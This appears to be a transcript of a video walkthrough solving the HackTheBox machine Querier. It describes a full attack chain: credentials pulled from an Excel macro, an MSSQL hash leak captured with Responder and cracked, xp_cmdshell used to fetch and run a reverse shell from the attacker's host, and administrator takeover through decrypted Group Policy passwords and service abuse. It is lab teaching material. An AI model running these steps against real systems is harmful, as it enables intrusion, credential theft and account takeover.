What's going on YouTube? This is psexec and we're doing Querier from HackTheBox, which was a relatively fun and easy box that didn't even have a web server. It starts off with finding a open SMB share that has an Excel document on it. You pull down the Excel document to extract a username and password that's in a macro. Use that to connect to the Microsoft SQL database, and notice that XP CMD shell is disabled, but you can do a dirt tree to call back to you in order to steal the hash that the Microsoft SQL Service account is using to run the service. Crack the hash, log back into this box, and then you can enable XP CMD shell, which then lets you get a low privilege shell on the box. With that shell, you can just run PowerUp and discover that group policy cache credentials on it, which has the administrator password pretty much in clear text. So let's jump in. As always, we're going to start off with the nmap, so -sc for default scripts, sv enumerate versions, OA output all formats, put in the nmap directory and call it Querier, and then the IP address, which is 10.10.10.125. Can take some time to run, so I've already ran it. Looking at the results, we have a handful of ports open. The first thing we have is MSRPC, which is Microsoft Remote Procedural Call on port 135, NetBIOS on 139, this Microsoft-DS on port 445, which essentially is Samba or SMB. Then we have Microsoft SQL Server on port 1433. Just based upon the ports, there's one thing that's missing from many HTTP boxes, and we don't have a web server to attack. So maybe we missed a port. So I'm going to do a full port scan with nmap-p- that does ports 1 through 65,535. Then OA, I'll call this all ports. I'll throw a few verbose flags in there so it shows me the open ports as it does find them. And I'm not going to do any scripts just because I want this to go pretty quick. And normally I don't do full UDP scans, but I will run a SNMP check in this. So SNMP check 10.10.10.125. And if it is open, we may just get port listings from SNMP. So with that going on, let's go back over to the nmap and review the script output, because it did run on Microsoft SQL, and we have the domain name, which is htb.local, the box's name, and then we also have this product build version. So I'm going to search this to get a rough idea of where the patches are on this box. So we just search 17.763 on Google, and then go to Windows 10 version history, and search this page, and we see it is related to version 1809, and its release date was November 13th, 2018. Now, this doesn't mean this was the last patch installed. It's just the last time, maybe it's the kernel or the code name has been updated. I don't know exactly what build or what the good technical term is, but this isn't the hotfix. So hotfixes could have been installed after November 13, 2018, but any exploit prior to this, we probably can just disregard. So while all those nmaps go, I don't see any HTTP ports. These are just ephemeral ports that Windows normally listens on. SNMP didn't really find anything, so I'm going to start looking at port 445. We could look at Microsoft SQL, but normally in order to get access to SQL, we need some type of credential. So let's go look at what is on port 445. Let's run SMBMap -H to specify the host, then 10.10.10.125. And this is going to fail just like it did in Sizzle. And in Sizzle, I gave up and did SMB-Client-N-L on 10.10.10.125. And that's how I listed the shares. But the Ghost Tom pointed out in a YouTube comment that if I had specified anonymous as the user with SMBMap, it would work. So we can do SMBMap -H 10.10.125-U anonymous and hit enter. We're finding open ports and it lists things. This doesn't always work for some weird reason. You may have to specify the domain. If you specify htb.local, you will find that there are no logon servers. And that's because this box cannot talk to the htb.local because it doesn't exist. So put the domain as like localhost if you get error messages, and it should work. And the reason why I like SMBMap over SMB client, let's see if I can show it easily on the screen. We have SMB client's output on the left here, and we just have share name and comment SMBMap tells us the access we have. So it's telling us we have access to read the IPC and reports directory. Reports is non-standard, so someone created that. So let's go dig into that. To do that, I am going to run SMB client. And before I do that, I'm going to run make-dir SMB, and I'm going to move all these nmap stuff into the nmap directory. There we go. And now let's just do SMB client dash, no dashes, dash capital N, and then / 10.10.10.125 / reports. So let's connect to this share. Come on. There we go. Do a ls, and we see a file, the currency volume report.xlsm, which is a Excel macro file. So I'm going to do a git against this file. I'm going to copy it, paste, and we have downloaded it. So we have an Excel macro file, and the macro just means it has the M. And if it was just I think XLS, it doesn't mean that this doesn't have a macro. So Office extensions are weird. I'll just leave it at that. The tool I normally use to go and examine this is called, I think, olevba. Let's see, olevba GitHub. Yep, here it is, OLE tools. So let's copy this and do a git clone. And I also want to do apt search just to make sure this is not in the Kali repo. And actually, it looks like it is. So let's do apt install Python OLE tools first and see if this gives us that package. And I suppose before I ran this, okay, I don't have it installed. I just want to make sure I didn't have it all ready before I install this package. So we'll find out if this installs it. And I guess while apt goes, we can do less nmap all ports.nmap and look at what is listening. And we have winrm, and the rest looks like ephemeral ports. We could do a script scan against all of these, but I'm going to go with probably not going to be a web server listening on that high of a port. But that package is still installing, so let's just go do it. So I'm going to go into the nmap directory. I'm going to cat all ports.nmap. Now we'll grep for anything that begins with a number, 0 to 9. And now I'm going to do an awk to split it on / print the very first match. Sort -u to make sure it's unique. Since there's only one IP, it's always going to be unique, but that's it. Send it to the file called ports. And how do I put these all in one line easily? Let's just do for I in cat ports, do echo-n I, comma. Done. Now I got a list of all the ports. So we can do nmap-sc-sv-p for port, specify the ports, and then the IP address, which is 10.10.10.125. And I should do script all ports. Oh, not script, OA. There we go. So let's see if OLE has finished. Oh, it finished a while ago, but I guess tmux just froze at installing. That's embarrassing. Do I have OLE tools? I do have OLE VBA now, so we should be able to run OLE VBA against currency volume. And we can see it's got two suspicious macros. It may open a file, and some hex coding was detected. So if we scroll up, we can see it's going to give us the macro. We have VBA, this workbook, private sub connect, and we do a connection to the server Querier, and then the password is this, And the username is, let's see, UID for user ID reporting. So username's reporting, password is this. So what I'm going to do is run Impacket's MSSQL client. And if you don't have this tool, you can just install it either through Kali. If you install it through Kali's apt, just do locate MSSQL client, and then it will be in this examples directory. And if you wanted to, you can install it off of Git and just do pip install period, and that should install everything. So let's go back to my directory and run MSSQL client and look at the flags we can do. So it looks like it's just the Python script, and then there's a -Windows auth flag, whether or not to use Windows authentication. Default is set to false. We got a debug output option, and let's see, target, and target is just username at target name or address. So we can do MSSQL client. I think it was reporting at 10.10.10.125, and we have to run OLE again in order to identify the password. So copy this, paste this in, and we get login failed. And I just made sure the password's good, username reporting, UID reporting. So let's try -Windows auth. Try this again, and we get in. So if we do any SQL command, let's try show databases. Could not find stored procedure show. If we did help, we can see what we can do. These are Impacket commands. So there is one for XP enable XP CMD shell. If we run it, we see we don't have permission to do that. So let's try stealing the hash of this service. So to do that, I'm going to run responder-i ton0, and then let's do XP underscore, I think it's dir tree, and then the file share. So we'll do 10.10.14.3, which is the IP address of my Kali box. We can verify that with just if config ton0. You can see 10.10.14.3 there. Any share name, because responder listens to them all. So we'll say please sub. And I forgot the end quotation mark. And we can see we get the service hash right here. So let's copy this, and let's SSH to a box where we have hashcat installed. Again, you can do this on your VM and it'll just go slow. I recommend doing it on your host. So let's go vhashes / the machine name dot ntlamv2, paste this in, and then we can do /hashcat, and then -- example format, example hashes, and then just less that net ntlm, and find net ntlm v2, which is mode 5600. So we can just do /hashcat -m 5600 hashes the file, and then opt word list rocku.txt. And then we see it has cracked it already. So if we go up, the password for that is corporate 568. So let's try this out. But before we do, let's just show something in responder. So if we had done this again, we just keep seeing skipping previously captured hash. So responder logs everything in a file called responder.db. So if you go into this, you can just do SQLite3 responder.db. I think it's .schema to list what the tables are. And they can do like select star from responder and get the output. If you only wanted to see like the hashes, you could specify what you wanted. So you could do type host name, and then full hash, I think. And we see net NTLM v2. The host name doesn't matter. Maybe I mistyped that. Don't know, but there's the hash. So if you want to get previous hashes in responder, that is how. So let's see. There's the password, and the username was MSSQLSVC. So what I'm going to do is SMBMap-U MSSQL-SVC -P, put the password, -D, the domain, and I'm going to specify what the domain is for this, and then -capital H 10.10.10 125. And we see we have no greater access. So if we had seen like admin on C, my next step would be to use like psexec, because then we could drop files into admin and whatnot. But since we can't write files over SMB, I know psexec would fail. The other thing we could potentially think about is doing Windows remoting, because if we go to that nmap scan we had ran and look at script all ports.nmap, we see WinRM is open. Or at least I think it is. I think it's this 5985 and 47001. But let's try connecting to Microsoft SQL with that service account first. So let's do that Python command again. And then instead, it's going to be the username, which is, let's just exit this, MSSQL-SVC, and get rid of that. There we go. Paste the password in, and that's no longer my clipboard. So, I guess I have to go into my Kraken again, tail-1 hashcat/hashcat.pot file, grab the password corporate 568, and then log in. So now on this, we can do help again, and let's try running XP-CMD shell. The last time we did this with the reporting account, we said, all right, Impacket said it didn't have permission. So doing this, looks like it did. And it says change from 0 to 1, run reconfigure statement to install. I'm not sure if Impacket does that automatically, so let's just try this. XP-CMD shell, who am I? So it looks like we don't have to run reconfigure. Impacket already takes care of that for us. So we can run commands on this box now with that XP-CMD shell. So let's get rid of this responder, make a directory www, go in there, and then we will copy Nishang there. So cp opt Nishang, and this is shells reverse TCP. Where is it? Invoke reverse. Where is it? PowerShell reverse PowerShell TCP.ps1. That's the name. And we'll just call that reverse.ps1. And then edit this file. And let's go grab this reverse line, hit Y twice for yank, capital G to go to the bottom, P for put, 5x to delete the first 5 characters, and let's change this IP address. So that's 333, that's 12, and then 3, so 15S to delete 15 characters, 10.10.14.3, and let's change the port to 9001 because that's the port I just always use. So now let's run python-m, simple HTTP server on port 80, and then netcat lvnp on port 9001. And let's do xp-cmd shell, PowerShell, ix new object, net.web client, 10.10.14.3. Probably have to specify HTTP as well. And then reverse.ps1. Try that. Syntax error. See, the only slashes I have are in the URL. So let's change it to quotes. missing parentheses, so let's escape these quotes. Let's see. Put the whole thing in single quotes. Does not work. Let's see. PowerShell, IEX, new object. Oh. No, that's right. .download string. I don't know how I missed that whole thing. There we go. Maybe I was just going too fast, but I forgot .download string after that. So we get the shell. So the one thing I don't like about the shell is I don't have up keys. We have all this. So what I'm going to do is run the program rl wrap, and you can install that through apt, I think, before I do netcat lvnp 9001. Just run this PowerShell command again. And now I have up keys. So we can run who am I, and we can see we're Querier / MSSQL-SVC. So let's go into, let's just run system info first to get an idea of what box we're on. And let's go to the top, and we can see it's a Microsoft Windows Server 2019 standard. So even if we have the impersonation token, impersonation privilege on this, it doesn't work on 2019, which is the juicy, rotten, etc. potato. And then we have hotfixes installed. So let's just grab, I'd only grab the highest number and just check this. And let's just do a spot check. So search that KB, we'll search this one and then the first one. January 8th. And that is January 22nd. January 22nd. So this box has been patched around the 1st of 2019 or January 2019. We could do who am I / priv. We see we have SE impersonate privilege, but that doesn't really get you anything on Windows 2019. So what I'm going to do is run PowerUp. But before we can run PowerUp, we have to copy it into a www directory. So we'll do cp opt powersploit-dev, and then this is under privesc powerup.ps1. Go over to a reverse shell, IX, new object, net.web client, download string, HTTP 10.10.14.3, powerup.ps1, and then invoke-all checks, and let this run, which will take a few minutes. So it looks like it finished. If we go to the top and search all checks, we have it telling us the very first thing is we have the SE impersonate privilege, which we went into. We can't exploit this because of Windows 2019. We have this service we could potentially abuse because, let's see, path. We could modify it, but I don't think we can restart this service. So we can try, oh, we can restart the service. So we can try running this and seeing what happens. And then let's see, we got modifiable path, a DLL hijack on this Windows app thing, but we can't restart this service. So in order for a DLL hijack to work, you can't just drop the DLL and have it just magically execute the code. You either have to reboot the machine, reboot the service, or do something like that. So that's why whenever I see something with these services, I am thinking, okay, can I exploit that? And this is in the App Store, so you may actually be able to do this with something. I'm not sure off the top of my head. Unintended file path, nothing there. And then we got a group policy object that has a credential. My uncles are Mario and Luigi with the administrator password. So we can try that. But the first thing I want to do is just run this Invoke-ServiceAbuse. And then let us restart the service. So what service is it? USO SVC. Let's see. Service abuse command. Cannot be started. So it doesn't look like we can. Restart service. USO SVC. Maybe it did. Net user. Oh, it does work. We created the user John. So just like that, I found something I did not know on this box. I didn't think that would work. So by default, Invoke-ServiceAbuse creates the user John with the password 123. So if we go and do SMBMap -u John -p password 123 -H 10 125. And let's see, finding open SMB ports. Let's do -d, the host name. And don't think it added John to the local administrators. Net local group administrators. He is, but he doesn't have access over CVOL. psexec John at 10 125. psexec.py. Password 123. Huh. Not exactly sure what's happening there. But let's try that credential we saw in the GPO service. So my uncles are Mario and Luigi. Paste that in. And we can see it's running to admin, and we'll get a shell. And if we had done SMBMap -u administrator -p, the password -d hostname H 10 125, you'll see that this will say administrator has full access over admin and C. Come on, don't make me a liar. There we go. Or read write. Good enough. And eventually, we should get a shell back. This box is just going extremely slow. So, come on, give the prompt. Once we get this prompt, we will dig into exactly what happened with this group policy object, and then I'm going to play with and see if I can get a shell as John real quick. So let's do who am I? And we are NT authority /system. So that is how you're supposed to root the box. Let us go back to here. Where are we? Okay. So let's go and do this group policy thing manually. So back in Windows 2008, Microsoft thought it was a good idea to let you set local administrator passwords via group policy. However, when they did that, in order to set it, it had to be reversible. They used AES and then went and published their AES key. So let's see if we can do a quick search. AES key group policy Microsoft. Will this pull it? Let's see. Docs Microsoft. There we go. And this is the private key to decrypt it. So they had published this, which then everyone used to be able to decrypt the credentials stored within group policy. So you can no longer set that, but every now and then you find people that set it a long time ago and it still exists. So let's go to cd/program data and let's look at www vim PowerUp.ps1. I want coloring. So let's Google Vim color PowerShell. Let's see. That doesn't look like it. Let's see. Come on. There's got to be syntax highlighting for this. Let's see, is this for PowerShell? Let's just try installing this. Paper color. We can do PowerShell syntax highlight Vim. There we go. This is what I wanted. Vim-PS1. So copy this. Go to temp. curl -o vim.zip cd home.vim unzip temp vim.zip replace, sure. And now let's go www vim PowerUp.ps1. That was an odd error message. That's some Windows formatting. .vim find dot dash type f. Okay. Dash exec DOS to Unix, and pray this works. Huzzah! We got it. So let's do a search for how this does it. The first thing I want to do, set IC to ignore case, and then we'll do GPP. So get group policy passwords. I don't know what this third P stands for. So let's see, how does this work? Let's just see what calls this. So we got GPP inner field that I think calls it. Okay, let's see what calls GPP inner field. So discover any locally cached group policy XML files, and it's searching for groups.xml, services.xml, scheduled tasks, data sources, printers, and drives. And it's going to all users application data or program data. So let's go back into our thing. We can just do dir/s/b, find str, group. cmd.exe/c, dir/sb, find str, group. There we go. We can do a type against this file to print it out. Get content to print it out. Get content parentheses to print it out. There we go. So I had to put quotes on both ends of that to get it to print because it has spaces in group policy. So now we got the file, we can copy this to our box, and then we no longer need the shell there. So we can call this groups.xml, set paste, paste it in, and then let's go and Google Python decrypt GPP. There we go. Raw copy vim deck.py, set paste, paste it in. So usage, this, and then C password. And C password looks like it wants it to be base64 because we're doing a B64 decode against it. So let's just try this. WQ cat groups.xml, name is administrator, UID, user context, C password, and a base64 string. So let's do Python deck.py, paste this in, and we get my uncles are Mario and Luigi. And if you look at deck.py, we see the key 4E9906E8 going to Microsoft's page 4E990608, and then 33B66C1B, 33B61B. So this is exactly how it's working. If you want, you can analyze this Python code to see how it decrypts it. But lastly, let's figure out how we can get a shell as John now. Lastly, let's figure out how we can privesc with that one vulnerable service. So we'll do rl wrap netcat lvnp 9001 to set up our shell again. Launch this XP CMD shell. We have to enable it and then launch it again. We had to enable it because there's a scheduled task that restarts that every now and then. So let's do ix new object net.web client download string http 10.10.14.3/powerup.ps1 to reload this. And then we will do invoke all checks, which does take a little bit, so we'll just fast forward. And now that it's done, let's go up and copy this Invoke-ServiceAbuse. And if we looked at Invoke-ServiceAbuse, we could see there are other things we can do other than just execute it. So let's, I guess, edit anyways, and we can do Invoke-ServiceAbuse. And where do we see what options we have? Description. Man, that is horrible to read. Let's get rid of syntax highlighting there. Something screwed it up. Invoke service. There we go. So we have parameter command, custom command to execute instead of user creation. So that's what I'm going to do. So let's go up here, invoke service abuse, the name of the service, dash command. We're going to do net user administrator. Please subscribe, and we'll put 2 exclamation points. So let this run, and we'll see if this now works. So copy the password, go down here, SMBMap -u administrator -p, put the password in, -d for domain, Querier -H, the host name 10.10.10.125, and we have authenticated and can read and write the cvol and admin vol. So let's just do psexec administrator at 10.10.10.125. Need .py. Paste in the password, and we can now get a shell. So the other method, obviously better because we're not changing a password. I'm sure you could have got around the restriction before. I'm not sure why John couldn't read and write cvol and admin vol being a member of administrators, but changing passwords is generally a no-no and something you only do as a last resort. You could have also just done a command to execute a file, and then that would have given you system. So if you just put like a interpreter or whatever executable in the box. So that's it. Hope you enjoyed the box. Take care, and I will see you all next week.